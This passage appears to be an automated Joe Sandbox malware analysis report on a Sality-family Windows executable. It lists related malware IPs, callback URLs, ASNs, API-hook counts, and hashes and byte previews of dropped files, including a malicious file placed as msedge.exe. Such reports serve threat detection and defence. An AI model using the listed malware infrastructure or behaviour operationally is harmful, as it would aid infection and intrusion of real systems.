                                                                                                                                                                                                        		51102IMPATT-ASMihaiViteazunr6D3126ROfalse
                                                                                                                                                                                                        89.41.154.115
                                                                                                                                                                                                        		unknownRomania
                                                                                                                                                                                                        		6910DIALTELECOMROfalse
                                                                                                                                                                                                        220.94.117.230
                                                                                                                                                                                                        		unknownKorea Republic of
                                                                                                                                                                                                        		4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                        122.169.249.87
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                                                                                                                                                                        58.140.114.152
                                                                                                                                                                                                        		unknownKorea Republic of
                                                                                                                                                                                                        		10036CNM-AS-KRDLIVEKRfalse
                                                                                                                                                                                                        61.95.152.112
                                                                                                                                                                                                        		unknownIndia
                                                                                                                                                                                                        		9498BBIL-APBHARTIAirtelLtdINfalse
                                                                                                                                                                                                        93.114.228.238
                                                                                                                                                                                                        		unknownSpain
                                                                                                                                                                                                        		29119SERVIHOSTING-ASAireNetworksESfalse

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1536844
                                                                                                                                                                                                        Start date and time:2024-10-18 09:37:07 +02:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 11m 12s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:6
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:35
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:PfBjDhHzvV.exe
                                                                                                                                                                                                        renamed because original name is a hash value
                                                                                                                                                                                                        Original Sample Name:31bbb64aa3c1753cd99c865869b58023.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.spre.troj.evad.winEXE@3/34@1/51
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 15.4%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 87%
                                                                                                                                                                                                        • Number of executed functions: 99
                                                                                                                                                                                                        • Number of non-executed functions: 48
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3032 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3300 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3364 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 3888 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4256 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4432 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4548 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 4692 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 5744 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 6644 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target faawXJQQDELvfTymNiVz.exe, PID 6748 because it is empty
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtDeleteValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                        • VT rate limit hit for: PfBjDhHzvV.exe

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        03:38:12API Interceptor601314x Sleep call for process: PfBjDhHzvV.exe modified
                                                                                                                                                                                                        03:38:13API Interceptor1x Sleep call for process: dllhost.exe modified
                                                                                                                                                                                                        03:38:24API Interceptor947x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                        03:38:38API Interceptor2x Sleep call for process: sihost.exe modified
                                                                                                                                                                                                        03:38:56API Interceptor20215x Sleep call for process: faawXJQQDELvfTymNiVz.exe modified

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        77.81.228.77SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                          190.120.227.91SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                          • 190.120.227.91:8080/sobakavolos.gif?e72c79e7=-416515609
                                                                                                                                                                                                          115.119.58.98SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                            189.35.177.247SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                              94.55.239.88SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                195.42.129.188SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                  81.180.90.149SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                    185.53.178.50SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                    • padrup.com/sobaka1.gif?e63fce22=2134836906
                                                                                                                                                                                                                    firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 185.53.178.50/
                                                                                                                                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.29279.29610.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.erminia.net/m49z/?Pbv=5jRLFfAHQxSlbh&jPgXH=YISnM5ovClGfRBNlug7t/bT4HKeyd0lIhqIihSOsPTkwr73PRG8iY85wP5Wvf2BGU1MY
                                                                                                                                                                                                                    http://fgoogle.deGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • fgoogle.de/favicon.ico
                                                                                                                                                                                                                    RFQ Ref. No. MS-DGP-220137.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.citasenlineabuscarmex.com/s32s/?X48DY=e1mxKMi98/LeHhnzWL/vnJ7rrniDAkIEtnvYqA+He0Na+XzS61P0KFnf2ea50viiW/zG0elXXQ==&h0=7n-p6N-hWtqH3R
                                                                                                                                                                                                                    Factura_842.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.autoinsuranceblog.online/ss5s/?4hlpd=hPRD&C8aX_v2X=Q6Fn6P47y8FyKnQottYd/zoaJzDc3jCGJ5kbYGNqycBtKEEoN293YMs24B+VMRpimMwC
                                                                                                                                                                                                                    New_1007572_021.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h
                                                                                                                                                                                                                    124.123.112.184SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      padrup.comSecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                      • 185.53.178.50
                                                                                                                                                                                                                      http://padrup.com/sobaka1.gif?51edc42=601359822Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 206.189.61.126
                                                                                                                                                                                                                      TzIxyOFL2Y.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                      • 206.189.61.126
                                                                                                                                                                                                                      iwV2wYLBqJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 206.189.61.126

                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      SARAONLINEINFORMATICAEIRELI-MEBRSecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                      • 190.120.227.91
                                                                                                                                                                                                                      apavlH3Bzb.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 190.120.227.218
                                                                                                                                                                                                                      TzIxyOFL2Y.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                      • 190.120.227.91
                                                                                                                                                                                                                      hz7NY6RFBXGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 190.120.227.210
                                                                                                                                                                                                                      I506VIfDY6Get hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 190.120.227.217
                                                                                                                                                                                                                      MgxZMcbt68Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 190.120.236.232
                                                                                                                                                                                                                      TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISPm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 14.142.207.21
                                                                                                                                                                                                                      m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 203.197.31.0
                                                                                                                                                                                                                      na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                      • 115.113.1.233
                                                                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 14.143.57.89
                                                                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 14.143.23.142
                                                                                                                                                                                                                      vEOTtk6FeG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 14.142.167.154
                                                                                                                                                                                                                      RFNnJGB7wy.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 59.163.33.118
                                                                                                                                                                                                                      na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 202.54.109.215
                                                                                                                                                                                                                      eLSH927bGM.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 121.244.236.105
                                                                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 59.163.98.199
                                                                                                                                                                                                                      CLAROSABRbotnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                      • 187.107.39.50
                                                                                                                                                                                                                      arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 179.158.111.68
                                                                                                                                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 189.43.200.175
                                                                                                                                                                                                                      spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 177.35.57.114
                                                                                                                                                                                                                      m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 189.86.58.245
                                                                                                                                                                                                                      i586.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 179.158.111.58
                                                                                                                                                                                                                      armv7l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 177.183.247.135
                                                                                                                                                                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 179.159.137.216
                                                                                                                                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 187.180.71.230
                                                                                                                                                                                                                      arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 187.123.195.17
                                                                                                                                                                                                                      ARUBA-ASNITarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 95.110.130.121
                                                                                                                                                                                                                      seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                                                                                                      • 62.149.128.40
                                                                                                                                                                                                                      6ONw866NZg.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 95.110.143.8
                                                                                                                                                                                                                      alWUxZvrvU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 62.149.128.40
                                                                                                                                                                                                                      PAYMENT ADVISE#9879058.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 62.149.128.40
                                                                                                                                                                                                                      High Court Summons Notice.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 95.110.136.136
                                                                                                                                                                                                                      Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 62.149.128.40
                                                                                                                                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 31.14.139.69
                                                                                                                                                                                                                      novo.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                      • 95.110.195.186
                                                                                                                                                                                                                      SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                      • 62.149.128.40

                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
                                                                                                                                                                                                                        weH771UOWv.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                          #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                                                                                                                                                                            a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                                                                                                                                                                              aspweb.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                                aspweb88.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4210216
                                                                                                                                                                                                                                  Entropy (8bit):6.5030627280414235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:4pawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BA:xehFLvTQDpB5oSOmlBm
                                                                                                                                                                                                                                  MD5:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                  SHA1:DC1F4774F3104DEA6A50646D6C11EFEFD2A29169
                                                                                                                                                                                                                                  SHA-256:F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
                                                                                                                                                                                                                                  SHA-512:03493D5105A3A0E8C95E6E0AC8D7F814FF075FE9D36C389067E021D55B4D75CA3BDD4D688EFA9B00D8A5E84513FF99774C2A4C9B30CC89FB8FF94154BFEB32A9
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: 942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: weH771UOWv.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: aspweb.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: aspweb88.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................A......<A...`..........................................'3......+3.P.....8......P6..e....@.((....A. 1..h.2.T.....................2.(...P"-.@............33.......3. ....................text...E.,.......,................. ..`.rdata..$#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc.........8.......6.............@..@.reloc.. 1....A..2....?.............@..B........................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_19_0.png

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                  Size (bytes):6873
                                                                                                                                                                                                                                  Entropy (8bit):7.896151483146773
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4LRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:JnpDlA/phc6hgkEQkxVk
                                                                                                                                                                                                                                  MD5:1382CE1BD44FA02B6C58580B02AEFA9C
                                                                                                                                                                                                                                  SHA1:BD1AABF4EBF1BFF840C1973EBAA02C1FEDF8D6C5
                                                                                                                                                                                                                                  SHA-256:DF1C6676A93EB0E347607F323E00F4063EDE1D19E54E7661E5CF6D0F39586E82
                                                                                                                                                                                                                                  SHA-512:CDCDCF15D72FC7FCFD05743954C09A09911EFD3964F0F55555EC30A37DBFDC6230224154CDCEF52BD0763C99F3CAD81C0045886E122274C8AC22A01D9CD850D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...2.....y.\.....gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.|......U.0.0.4*..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>*..}`.....j..........M..-..x...,!..L+.'........*..s77f.|.h..*.0/.4||......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E....a...m..7;@..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-wal

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61800
                                                                                                                                                                                                                                  Entropy (8bit):2.7496603699052975
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:oxq+62/1fjdMj5EZjjJoGiBv8bti6ItwKbOQ6U8zeMzeKS9N1fAfH6TE87+iyAvy:kH1bdMKiVomtwoOQbCLfS7TE86tf
                                                                                                                                                                                                                                  MD5:2B6ABABF58031191CF5DE1F5C47D04AB
                                                                                                                                                                                                                                  SHA1:B8456FDD6EA973841803AE6413C4922D50F29EF0
                                                                                                                                                                                                                                  SHA-256:ECB772CD0C1FA9AA865DA46B419E3624C61FC77BBD339925B0A5601A04266305
                                                                                                                                                                                                                                  SHA-512:1BFAB0F761CD1D09482CE6FDE8754F99A4CCB54C928E2FBB27258D34F4BAABA45ADA7CEBFBA9564C561E362A3F2FEDCAEB0F274432C83753AE03B763D1F1FBFF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:........w~].T39.p\...F........K............~.K.c........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                  Entropy (8bit):0.6785130725630784
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:0qbYeV/bYeVvIS3cizmqbYeV/bYeVvIS3ciz:0qbDxbDWS3ciCqbDxbDWS3ci
                                                                                                                                                                                                                                  MD5:877B90FACBB50A73525A7D67A832A387
                                                                                                                                                                                                                                  SHA1:C82D90672BE77E3E8A4DFF747EE8CB67DCBAE4AE
                                                                                                                                                                                                                                  SHA-256:4402ACC37D001AD218C8D0E7F15A45EDC161EE73103E33F502A9430E0C0B5622
                                                                                                                                                                                                                                  SHA-512:1B4B58A8115034D96A48765F3A524824D6E027E9002CC62C21A1B2CBD48BBD63AD67FE6D1CA4997E8DE540EAF304420C586457D06189F7B17748FD5B34BA6616
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.p.|..........+.....:.I..(...{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\.........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................0u.............................................................................+............................. ..........P.......h.%.......#......./..(...{..................C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t............................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):524288
                                                                                                                                                                                                                                  Entropy (8bit):2.2240426504802597
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:fxv7Cfw/1p+bv6bohNWXx7SY1ihhdePWkAWcKcUfEbb4QO4Xurs/L:fxAKaeoe7SYsdePWkAWXcbbU4urs/L
                                                                                                                                                                                                                                  MD5:71EAC33A177EC7446049B5603D5180CB
                                                                                                                                                                                                                                  SHA1:E5DE8B8DB44A2026B14B7FD37AD2239FFBD71421
                                                                                                                                                                                                                                  SHA-256:3EEF2888E39598248141C5CBD4E235001D1C74B336B76217DAEE0CB82C5E7A0E
                                                                                                                                                                                                                                  SHA-512:60135F300C9E6748E33DD2CF912144952251A274F2E981A9B7F1471BC9F77DF3355EC04A1B91830FA5C7C019543F6212BEBDA1A61B78F4B09AA7A2AC96AAFB54
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..E.............93...{a..2...{+.........<...:.I..(...{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\.........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................0u.............................................$..........V...".".#......... ..g.......P.......h.%.......#......./..(...{..................C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t....................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2e72a4bb, page size 32768, Windows version 10.0
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):14680064
                                                                                                                                                                                                                                  Entropy (8bit):0.9773279575512861
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:4gMnQEUUMBPPpBPJmNjfiEWC7WswQpWK/qZCCkxpu514dCVZ3L9yqXx4SU8GxJHL:Zn/cj5tND5ApBK4K
                                                                                                                                                                                                                                  MD5:29F82281C71286ECE678EF8D3353F39C
                                                                                                                                                                                                                                  SHA1:E0B3BFB686049528A0A9A16AAFE5C4F68B5B3EBC
                                                                                                                                                                                                                                  SHA-256:4679C5565085531BAA90A292345918061367A2F5A2746DCAA9A8D6CE8274F466
                                                                                                                                                                                                                                  SHA-512:254D1854B01182C6C97FE21503C358DF41429E6C9FF39EDA110A975000431B8FC7814B2AAD508EE5AD29373FD6402BBB7B3D5CA9770804BF32FFE41FEC542487
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.r..... ................./..(...{........................*.....)'...|...&...|K.h.(.....)'...|....*.........:.I..(...{..............................................................................................P...........eJ......n........................................................................................................... ............................................................................................................................................................................................................(...{.................................../.j)'...|.....................)'...|...........................#........*.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                  Entropy (8bit):0.12241959681009394
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:cllaNz6+xiDfl1mCifel0VAl1allrECXlFllKIlnr4Nj/VQ3luP89lmKwoJlEzM7:cuz6jmC25X1OI3VuP83JCD/+
                                                                                                                                                                                                                                  MD5:9F0153FC7A694840BED1ABB9AF0EE2CD
                                                                                                                                                                                                                                  SHA1:E41A453C42905D880C064C20D0AFB23FBB119B85
                                                                                                                                                                                                                                  SHA-256:EB1A059A11B8C94A8A6ABDCBFC481777C3B63E1112EAC860BCB18B49BE222A74
                                                                                                                                                                                                                                  SHA-512:CF123E090852B0822BBF720393DC5BB71A2E381762AAB488733A5B589E4BF0C4F10DDE085A3BAAAB603B87DA9F31D5A1419FD62F0AAF7DC5AB487D5B486D5535
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:F#......................................(...{...&...|K.)'...|...........&...|..)'...|..D...('...|.....................)'...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nlnup.exe

                                                                                                                                                                                                                                  Download File
